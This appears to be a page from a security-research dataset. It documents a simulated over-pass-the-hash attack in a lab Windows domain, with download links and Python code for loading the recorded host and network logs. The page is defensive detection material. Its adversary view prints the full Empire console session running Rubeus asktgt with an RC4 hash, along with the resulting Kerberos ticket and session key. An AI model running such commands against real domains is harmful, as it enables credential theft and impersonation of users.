Rubeus Userland ASKTGT PTT

Metadata

Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2019/03/19
Modification Date	2020/09/21
Tactics	TA0006
Techniques	T1003.003
Tags	Over-Pass-The-Hash,Not Touching LSASS

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Datasets Downloads

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip
Network	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_ptt.zip

Simulation Metadata

Tools

type	Name	Module
C2	Empire	shell
binary	Rubeus	asktgt

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            

(Empire: agents) > interact 4EH9PC5S
(Empire: 4EH9PC5S) > 
(Empire: 4EH9PC5S) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 2
(Empire: 4EH9PC5S) > 
______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
      SCmXhrxOqig5LjU/zlOxxj72iV0Io1vDNrnEHqq0hTNheiEb2Oz3yOEk3Ct6qioIJmjm/PE+MoazpfNa
      DOQUkxLNyEti0ltIyI2I2docI0yIbXA8BNRrGojFdruBcOs5NdDfi2Ttsng+NcZzWmCH4D3amx7AjOMr
      jRotAieTg98Uzt3AG03bQSlPNkLJCW/Pnz5YCE8I8zIrkkGH+mTA+mGg4cNeVJE38nOlShq0meRMKKxC
      drFfzsCgJ64r9dVBP+LmegRcUbrPLv6d2UHc+k0ELbhhfHgiy5m06UaLfrAe8fiUcHsdN0cJ1+4f9KCL
      NsbjXJN85QQGzdOFFjJ07hir+SZ1UU+0NSaOkbFHz178KMk2P/9yWT9UqTEHV2qXuHS4scCV5SQirH6b
      HAWlEpqeEwh+yGUmhLGs8Jo9sBsNEQ6EdFUzA+JjD4itQa4IMgLSLNEwzkZOle85Jbw4kDFsFmtckKVu
      1osdI7dxA9wM/dZElOVUiI2cYqbI+pOcyPJHuzhbYnVhUhKFi29ZxPe1an0T7tNoy1zCFSs0z3V5RKwZ
      4eUVQVxYGspUbB4h21/zEbus+NGTzWtJMqb6L4abOj1iLiRgJagyFKk5h91fasaRUoVAo3VxiIbrPqfh
      kH393T/SC9ZObPESkBY8FVvhs/kuqRZIIhflbdYsTdcp0sa/F7Mo90CREIhH3EqgIQ/e97eK1Z9fr3Ma
      HGfFBEEYcHIm28FQU3gtyMFTSp9gswbq3YtsOMGF5oLY8Po6vAdhHV2wStV9FDPVPepT4USsZGYZ567p
      40PiSGBRUmCevWqrIA5kNwKD8QvaefXrGLZ+oXes9dt3CqHENQ4pJN67gUZq/F5tfFWYwDkefjNWMOwY
      lIAEvyxrxlnA8ouBkvkLSkz4jYMjUCstdJ7TiF/GMboXAX1kfQpv01sMV/39RdSaE4s6aTGlqX2vDShM
      OSdwfSS4qTU8kTkWuKgUh/Fcs2jYbjKfDvOqfkY5fAf+JSPRwqBC4mhsoGDLd3XGFba7prlV0VopSymj
      //ZpVE70a2VJazJHuHoS1ZWvNVILQwF0FteGc5UYQHPMlAC7v6Qr360g8mHv9PG6AS7dHb3WWnezaRV7
      ByPSxZ2B/WHEYWROuXlAK+dKWKWU31/NK6rX8l4Re8OUeu4/lGoEwZikKWxs+jE1zSOww46iZA78zJ3u
      QVeK8t90Z28pxwRX8mo2/PfnOEFwVJMsrBSiwLrLFDbjGqCX8ktaZ1ZTxcXLYu8mfDvCs9KAUMRvncBH
      g5yHUuoX6dIAY6EhWmpeSmqwV5VCV1kUarhKJt+JTC3Yjg9FaPGkJlJae6OB3DCB2aADAgEAooHRBIHO
      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEGTttXVs0y3nHHWU3quEoDChEBsOVEhFU0hJUkUuTE9D
      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAyMzkxM1qmERgPMjAy
      MDA5MjIxMjM5MTNapxEYDzIwMjAwOTI5MDIzOTEzWqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=
[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 10:39:13 PM
  EndTime               :  9/22/2020 8:39:13 AM
  RenewTill             :  9/28/2020 10:39:13 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  ZO21dWzTLeccdZTeq4SgMA==

..Command execution completed.

(Empire: 4EH9PC5S) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)

References

• https://github.com/GhostPack/Rubeus#example-over-pass-the-hash